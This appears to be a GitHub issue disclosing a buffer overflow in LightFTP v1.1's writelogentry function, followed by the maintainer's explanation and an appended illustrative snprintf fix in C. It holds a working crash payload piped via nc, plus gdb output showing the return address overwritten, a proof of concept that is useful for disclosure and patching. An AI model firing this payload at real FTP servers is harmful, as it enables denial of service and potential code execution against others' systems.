Hello,
I've noticed a buffer overflow in the Unix version of LightFTP v1.1. This happens in the "writelogentry" function.

With this payload:

```shell
python -c 'print "USER anonymous\nPASS anonymous\n" + "A"*499 + "B"*10 + "\x0D\x0A" ' | nc 127.0.0.1 9999
```

With this configuration:

```ini
[ftpconfig]
port=9999
maxusers=1
interface=127.0.0.1
external_ip=127.0.0.1
local_mask=255.255.255.0
minport=6000
maxport=6999
logfilepath=./fftplog

[anonymous]
pswd=anonymous
accs=readonly
root=./ano

[uploader]
pswd=*
accs=upload
root=./up

[ftpadmin]
pswd=*
accs=admin
root=./adm
```

POC:

```
0x5649328723ed <writelogentry+1805> ret    ← $pc
0x5649328723ee <writelogentry+1806> xchg   ax, ax
0x5649328723f0 <writelogentry+1808> mov    r8d, 0x30
0x5649328723f6 <writelogentry+1814> mov    WORD PTR [r14+rdx*1+0x1], r8w
0x5649328723fc <writelogentry+1820> jmp    0x564932872169 <writelogentry+1161>
0x564932872401 <writelogentry+1825> nop    DWORD PTR [rax+0x0]
──────────────────────────────────────────────────[ source:../ftpserv.c+440 ]────
    436
    437      strcat(_text, CRLF);
    438
    439      return writeconsolestr(_text);
    440  }                                   ← $pc
    441
    442  void WorkerThreadCleanup(PFTPCONTEXT context)
    443  {
    444      struct timespec waitinterval;
──────────────────────────────────────────────────[ threads ]────
[#0] Id 3, Name: "fftp", stopped, reason: SINGLE STEP
[#1] Id 2, Name: "fftp", stopped, reason: SINGLE STEP
[#2] Id 1, Name: "fftp", stopped, reason: SINGLE STEP
──────────────────────────────────────────────────[ trace ]────
[#0] RetAddr: 0x5649328723ed, Name: writelogentry(context=<optimized out>, logtext1=<optimized out>, logtext2=<optimized out>)
[#1] RetAddr: 0x4141414141414141
[#2] RetAddr: 0x4242414141414141
[#3] RetAddr: 0x4242424242424242
[#4] RetAddr: 0xa0d
[#5] RetAddr: 0x7f6e940009c0
[#6] RetAddr: 0x7f6e99abee84
[#7] RetAddr: 0x7f6e99abeea0
[#8] RetAddr: 0x10000000a
[#9] RetAddr: 0x0
──────────────────────────────────────────────────────────────────
0x00005649328723ed 440 }
gef➤ x/10gx $rsp
0x7f6e99abee48: 0x4141414141414141 0x4242414141414141
```
This buffer overflow can lead to remote code execution or a denial of service. I hope this will help you to fix the vuln.
POSIX version fixes
a964370
Addressing issue #5
Thanks for reporting this bug. The recv buffer rcvbuf in the ftp_client_thread routine is limited to PATH_MAX * 2, but the internal buffer _text in writelogentry is only 512 chars, resulting in the buffer overflow you pointed out.
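Added example (not LightFTP's code) of the fix pattern the maintainer's comment describes: a log-line builder that bounds every write to the 512-byte buffer with `snprintf` and keeps the trailing CRLF when it has to truncate, next to a helper that only models the arithmetic of the original unbounded copy-then-`strcat` sequence to report whether a given input would have overrun the buffer. The function names, the `127.0.0.1 ` prefix and the constructed 509-byte line (499 `A` + 10 `B`, the length of the report's payload) are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Same size as the _text buffer the maintainer describes. */
#define LOGBUF_SIZE 512
#define CRLF "\r\n"

/* Models the arithmetic of the original unbounded build (copy, append, then
 * strcat(_text, CRLF)) into a 512-byte array, without performing it:
 * true means that sequence would write past the end of the buffer. */
bool would_overflow_fixed_buffer(const char *prefix, const char *logtext1,
                                 const char *logtext2)
{
    size_t need = strlen(prefix) + strlen(logtext1) + strlen(logtext2)
                + strlen(CRLF) + 1; /* +1 for the terminating NUL */
    return need > LOGBUF_SIZE;
}

/* Hardened builder (hypothetical, not LightFTP's own writelogentry): every
 * write is bounded by outsize, and a truncated entry still ends with CRLF so
 * the log stays one entry per line. Returns true when the whole entry fit,
 * false when it had to be cut. */
bool build_log_entry(char *out, size_t outsize, const char *prefix,
                     const char *logtext1, const char *logtext2)
{
    const size_t crlf_len = strlen(CRLF);
    if (outsize < crlf_len + 1) {
        if (outsize) out[0] = '\0';
        return false;
    }
    int n = snprintf(out, outsize, "%s%s%s%s", prefix, logtext1, logtext2, CRLF);
    if (n < 0) {
        out[0] = '\0';
        return false;
    }
    if ((size_t)n >= outsize) {
        /* snprintf already NUL-terminated at outsize-1; overwrite the last
         * kept bytes with CRLF so the truncated entry is still well-formed. */
        memcpy(out + outsize - 1 - crlf_len, CRLF, crlf_len);
        out[outsize - 1] = '\0';
        return false;
    }
    return true;
}

int main(void)
{
    /* Constructed input with the same length as the report's payload line:
     * 499 'A' followed by 10 'B' (509 bytes). */
    char cmd[510];
    memset(cmd, 'A', 499);
    memset(cmd + 499, 'B', 10);
    cmd[509] = '\0';

    const char *prefix = "127.0.0.1 "; /* assumed per-entry prefix */
    char text[LOGBUF_SIZE];

    printf("original arithmetic would overflow: %s\n",
           would_overflow_fixed_buffer(prefix, cmd, "") ? "yes" : "no");
    bool fit = build_log_entry(text, sizeof text, prefix, cmd, "");
    printf("hardened: fit=%s, stored %zu bytes, ends with CRLF=%s\n",
           fit ? "yes" : "no", strlen(text),
           strcmp(text + strlen(text) - 2, CRLF) == 0 ? "yes" : "no");
    return 0;
}
```

The check `(size_t)n >= outsize` is the part that matters: `snprintf` returns the length the full entry would have had, so comparing it against the buffer size both prevents the write and tells the caller that the entry was shortened, which is worth logging separately since oversized input on a control channel is itself a signal worth alerting on.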